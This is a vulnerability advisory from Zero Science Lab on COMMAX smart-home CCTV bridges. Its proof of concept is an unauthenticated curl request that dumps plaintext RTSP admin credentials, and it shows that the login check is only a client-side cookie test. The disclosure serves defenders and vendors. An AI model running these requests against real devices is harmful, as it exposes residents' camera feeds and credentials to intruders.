COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure

`  
COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure  
  
  
Vendor: COMMAX Co., Ltd.  
Prodcut web page: https://www.commax.com  
Affected version: n/a  
  
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment  
complex that provides advanced life values and safety.  
  
Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker  
to disclose RTSP credentials in plain-text.  
  
Tested on: GoAhead-Webs  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5665  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php  
  
  
02.08.2021  
  
--  
  
  
$ curl http://TARGET:8086/overview.asp  
<HTML>  
<HEAD>  
<TITLE> Infomation</TITLE>  
<script src="./jquery.min.js"></script>  
<script src="./jquery.cookie.js"></script>  
<script src="./login_check.js"></script>  
</HEAD>  
<BODY>  
<br><br>  
<center>  
<table>  
<tr><td>  
<li> [2021/08/15 09:56:46] Started <BR> <li> MAX USER : 32 <BR> <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@[email protected]:554/Streaming/Channels/2:554 <BR>  
</td></tr>  
</table>  
</center>  
</BODY>  
</HTML>  
  
  
$ curl http://TARGET:8086/login_check.js:  
var server_ip = $(location).attr('host');  
var server_domain = server_ip.replace(":8086", "");  
  
document.domain = server_domain;  
  
var cookiesAuth = $.cookie("cookiesAuth");  
  
if (cookiesAuth != "authok") {  
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";  
}  
`